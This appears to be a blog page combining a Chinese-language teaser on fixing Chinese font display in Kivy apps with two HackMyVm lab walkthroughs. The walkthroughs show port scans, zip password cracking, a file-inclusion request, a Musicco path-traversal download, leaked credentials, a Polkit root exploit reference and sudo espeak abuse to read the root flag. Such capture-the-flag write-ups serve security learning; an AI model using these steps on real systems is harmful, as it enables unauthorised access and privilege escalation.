一、解决中文乱码问题

Kivy和KivyMD原生不支持中文,采用的默认字体是英文字体,直接运行起来就会显示方框。

Kivy中可以通过设置LabelBase修改字体,但是每一个控件都要在代码中增加font_style的定义,非常不方便。而KivyMD的控件就没有提供定义LabelBase改字体的功能。

而且,即使在本机开发环境中修改了字体设置,在打包生成apk文件安装后,在手机上运行时仍然是乱码。

下面是使用buildozer打包时,彻底解决中文乱码问题的方法。

继续阅读

HackMyVm Drippingblues Walkthrough

HackMyVm Drippingblues Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Drippingblues

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100                
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rwxrwxrwx    1 0        0             471 Sep 19 18:57 respectmydrip.zip [NSE: writeable]
 | ftp-syst:                                                                  
 |   STAT:                                                                    
 | FTP server status:                                                          
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII                                                                                                                                          
 |      No session bandwidth limit
 |      Session timeout in seconds is 300                      
 |      Control connection is plain text                        
 |      Data connections will be plain text                      
 |      At session startup, client count was 4      
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
 |   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
 |_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 2 disallowed entries  
 |_/dripisreal.txt /etc/dripispowerful.html
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 200) [Size: 138]
/robots.txt (Status: 200) [Size: 78]


Check index.php, get 2 user names.

```bash
 ~ curl http://192.168.56.100/index.php  
 <html>
 <body>
 driftingblues is hacked again so it's now called drippingblues. :D hahaha
 <br>
 by
 <br>
 travisscott & thugger
 </body>
 </html>⏎              

Check robots.txt, get a text file and a local html file.

~ curl http://192.168.56.100/robots.txt
 User-agent: *
 Disallow: /dripisreal.txt
 Disallow: /etc/dripispowerful.html

Login ftp anonymous, download respectmydrip.zip. Bruteforce the zip pass.

 ~ fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt respectmydrip.zip
 PASSWORD FOUND!!!!: pw == 072528035

Unzip respectmydrip.zip, in respectmydrip.txt, get hint.

 ~ cat respectmydrip.txt
 just focus on "drip"⏎  

Fuzz index.php with param drip=/etc/dripispowerful.html. Get a password string.

 ~ curl 'http://192.168.56.100/index.php?drip=/etc/dripispowerful.html'    
 <!DOCTYPE html>
 <html>
 ...
 </style>
 password is:
 imdrippinbiatch
 ...

Try username thugger we got from index.php. Successfully login ssh.

```bash
~ ssh thugger@192.168.56.100 ...
thugger@drippingblues:~$ id
uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)


The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit

 ```bash
root@drippingblues:/home/thugger# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 drippingblues

HackMyVm Dance Walkthrough

HackMyVm Dance Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Dance

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 ...
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 ...
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found /music.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 121]
 /music                (Status: 301) [Size: 169] [--> http://192.168.56.100/music/]

Enter /music in web browser, check information, it's a web app called musicco.

image-20210914101829803.png

Search exploit of musicco.

```bash
~ searchsploit musicco

Exploit Title | Path

Musicco 2.0.0 - Arbitrary Directory Download | php/webapps/45830.txt


Through the exploit, we can download the whole html dir as a zip file.

 ```bash
~ wget 'http://192.168.56.100/music/?getAlbum&parent=../../&album=var' -O var.zip

Unzip var.zip, check /music/config.php, get some credentials.

```bash
~ cat config.php
<?php
$_CONFIG['saveConfig'] = '';
$_CONFIG['users'] = array(
array('admin', 'admin', 'true'),
array('guest', 'guest', 'false'),
array('aria', 'seraphim', 'false'),
array('alice', 'rememberyou', 'false'),
array('ava', 'password', 'false'),
array('alba', 'thehostof', 'false'),
);
$_CONFIG['lang'] = 'en';
$_CONFIG['musicRoot'] = 'music';
$_CONFIG['coverFileName'] = 'folder';
$_CONFIG['coverExtension'] = '.png';
$_CONFIG['loadLyricsFromFile'] = 'on';
$_CONFIG['downLoadMissingCovers'] = 'on';
$_CONFIG['searchEngine'] = '';
$_CONFIG['imageSearchEngine'] = '';
?>


We can login ssh as user aria.

 ```bash
~ ssh aria@192.168.56.100
 aria@dance:~$ id
 uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Another user is alba, but it's nologin.

```bash
aria@dance:~$ cat /etc/passwd|grep alba
alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin


So we need to set the login shell for alba, then escalate to user alba.

```bash
 aria@dance:~$ su -s /bin/bash alba
 Password:
 alba@dance:/home/aria$ id
 uid=1001(alba) gid=1001(alba) groups=1001(alba)

Check sudo -l.

alba@dance:/home/aria$ sudo -l
 Matching Defaults entries for alba on dance:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User alba may run the following commands on dance:
     (root) NOPASSWD: /usr/bin/espeak

The last step is to use espeak to read (or listen to) /root/root.txt.

```bash
alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt -q -X
Translate 'rootflag'


 ...